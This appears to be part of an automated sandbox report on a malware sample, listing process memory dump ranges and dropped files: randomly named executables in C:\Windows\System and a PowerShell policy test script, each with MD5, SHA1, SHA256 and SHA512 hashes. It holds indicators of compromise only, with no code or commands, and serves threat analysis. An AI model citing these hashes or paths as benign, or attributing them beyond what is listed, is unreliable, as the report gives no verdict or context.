memory/5116-89-0x00007FF785700000-0x00007FF785AF2000-memory.dmp

C:\Windows\System\SIRraOO.exe

MD5 93b14829e410f24e60ae8ac2f228c5a2
SHA1 8e59c2d6242af8c5b8e28bc234dc5cb853a92480
SHA256 82863ca5290bb69e1cd99a7a5d85158507b7e3bde82e93f3123cfb72ce0b05d7
SHA512 73ac7ae5236cba0efc494b65f4d960521c48283e92f58cc7d5349c34b8eaccf040a7b7b0c93e96d529318a473a3fd3d1b95ab2aedc1e47f19fd5acbdc466928b

memory/1212-96-0x00007FF621C10000-0x00007FF622002000-memory.dmp

C:\Windows\System\mHtnkLe.exe

MD5 753648a3ef23948b4fb784fa50a80b29
SHA1 6dc833ee2b93ab4e399ea7462e4848cb89209a29
SHA256 9db84a2640acbacc0884f4e040e5378bb089aac6531d04d58b497fc41d712f74
SHA512 d35b8ffd19c98a824e0679169742286fbbd2a8c1fa6c2c064dd99a61637519c7607cf5dd36c28f3142a497205395ed2b05328c8f06aa8bdb05a61e506240c8f3

memory/4340-75-0x00007FF772F40000-0x00007FF773332000-memory.dmp

C:\Windows\System\OmLirDO.exe

MD5 95ca3e489ee87520d1e395f26743dbf2
SHA1 ec377e78e3fdcce89dd2a15111c045e42c0ca4d5
SHA256 a76ece807cf81b8a4153f73158f647c9b31ac74a7461643047b39e7f878954e4
SHA512 3d71461c818230dae5e116c1f7797359424b3a13800d67901811affdd22b657a44875649bddd2555e9664763d22c89bb2fc3c5108041c76f0d3af324cd57d508

memory/2540-64-0x00007FF72D830000-0x00007FF72DC22000-memory.dmp

C:\Windows\System\gqbhrYH.exe

MD5 21a160e68f306214e1f190a729de78cb
SHA1 3b68e86a3935f49ea9290fe3a3df397431f79877
SHA256 bb79681b4deea9cd8fb10ed9e80389a7566b55561adda5e148e5e04326d9336b
SHA512 cda9cf23ea2eaf95e1f8c274f543787dac8c9f88ce55c6b8bcd6b92467007f4c13722718c7ca669063d5f3c23fedc67ce8b5ce613f108aba42da871836794416

C:\Windows\System\sftvZTT.exe

MD5 bd8064476e81db808846350ecdc89759
SHA1 9c3750460d7f70d9fd69971ce6fe0373adb70f92
SHA256 431783beac7761c854911fc66720c2d6b6b47530e8dee8d312ff31b4de99ea2b
SHA512 8222f3bed266b7826ed1b67f1c90fe7a96c0d4784fa4f387012cac1f775093e03ae124c110e63079d4b0c487310ec81582e0245f5313590f496a3a863c7e93fe

memory/4268-52-0x00007FF60CA20000-0x00007FF60CE12000-memory.dmp

memory/1632-47-0x000001D5FC6D0000-0x000001D5FC6F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oztort2t.xmx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4464-33-0x00007FF680AD0000-0x00007FF680EC2000-memory.dmp

memory/4560-23-0x00007FF621EE0000-0x00007FF6222D2000-memory.dmp

memory/1632-22-0x00007FF9430B0000-0x00007FF943B71000-memory.dmp

C:\Windows\System\mQFsvBO.exe

MD5 43001000fd230c8d1da6aa44148de151
SHA1 caee04a6e17cd1e7604e54eb424a88ef2e77a8dc
SHA256 399431b8028c34bdf7a6d93cbc58c18178f1f423af8cf087063d73dda291db20
SHA512 02efc003449cc415e5db2b458f6a33fdd4b8f4243b6191410519be65b0e3cb99bb18d68d1cb94e4795a0853a404e9d95de1df5404194e26a56ffa942edca6a93

memory/940-1182-0x00007FF70E7B0000-0x00007FF70EBA2000-memory.dmp

memory/1632-1186-0x00007FF9430B0000-0x00007FF943B71000-memory.dmp

memory/3688-1197-0x00007FF6E5910000-0x00007FF6E5D02000-memory.dmp

memory/2284-1207-0x00007FF64B700000-0x00007FF64BAF2000-memory.dmp

memory/2396-1205-0x00007FF61F730000-0x00007FF61FB22000-memory.dmp

memory/1080-1196-0x00007FF77D440000-0x00007FF77D832000-memory.dmp

memory/2540-1193-0x00007FF72D830000-0x00007FF72DC22000-memory.dmp

memory/4340-1281-0x00007FF772F40000-0x00007FF773332000-memory.dmp

memory/4924-1294-0x00007FF654700000-0x00007FF654AF2000-memory.dmp

memory/1816-1291-0x00007FF7A84B0000-0x00007FF7A88A2000-memory.dmp

memory/1632-1278-0x00007FF9430B3000-0x00007FF9430B5000-memory.dmp

memory/1632-2132-0x00007FF9430B0000-0x00007FF943B71000-memory.dmp

memory/4560-2154-0x00007FF621EE0000-0x00007FF6222D2000-memory.dmp

memory/4464-2156-0x00007FF680AD0000-0x00007FF680EC2000-memory.dmp

memory/4268-2160-0x00007FF60CA20000-0x00007FF60CE12000-memory.dmp

memory/1408-2159-0x00007FF716410000-0x00007FF716802000-memory.dmp

memory/1212-2167-0x00007FF621C10000-0x00007FF622002000-memory.dmp

memory/372-2174-0x00007FF708700000-0x00007FF708AF2000-memory.dmp

memory/4340-2172-0x00007FF772F40000-0x00007FF773332000-memory.dmp

memory/2540-2171-0x00007FF72D830000-0x00007FF72DC22000-memory.dmp

memory/5116-2168-0x00007FF785700000-0x00007FF785AF2000-memory.dmp

memory/2076-2164-0x00007FF67A8C0000-0x00007FF67ACB2000-memory.dmp

memory/1460-2163-0x00007FF711C80000-0x00007FF712072000-memory.dmp

memory/3152-2198-0x00007FF680D00000-0x00007FF6810F2000-memory.dmp

memory/4572-2224-0x00007FF669150000-0x00007FF669542000-memory.dmp

memory/1308-2223-0x00007FF66AAD0000-0x00007FF66AEC2000-memory.dmp

memory/2148-2217-0x00007FF663A00000-0x00007FF663DF2000-memory.dmp

memory/1080-2214-0x00007FF77D440000-0x00007FF77D832000-memory.dmp

memory/3688-2212-0x00007FF6E5910000-0x00007FF6E5D02000-memory.dmp

memory/4036-2210-0x00007FF7B0750000-0x00007FF7B0B42000-memory.dmp

memory/2396-2206-0x00007FF61F730000-0x00007FF61FB22000-memory.dmp

memory/2052-2205-0x00007FF7511E0000-0x00007FF7515D2000-memory.dmp

memory/2284-2200-0x00007FF64B700000-0x00007FF64BAF2000-memory.dmp

memory/3280-2209-0x00007FF6960E0000-0x00007FF6964D2000-memory.dmp

memory/1816-2203-0x00007FF7A84B0000-0x00007FF7A88A2000-memory.dmp

memory/4924-2396-0x00007FF654700000-0x00007FF654AF2000-memory.dmp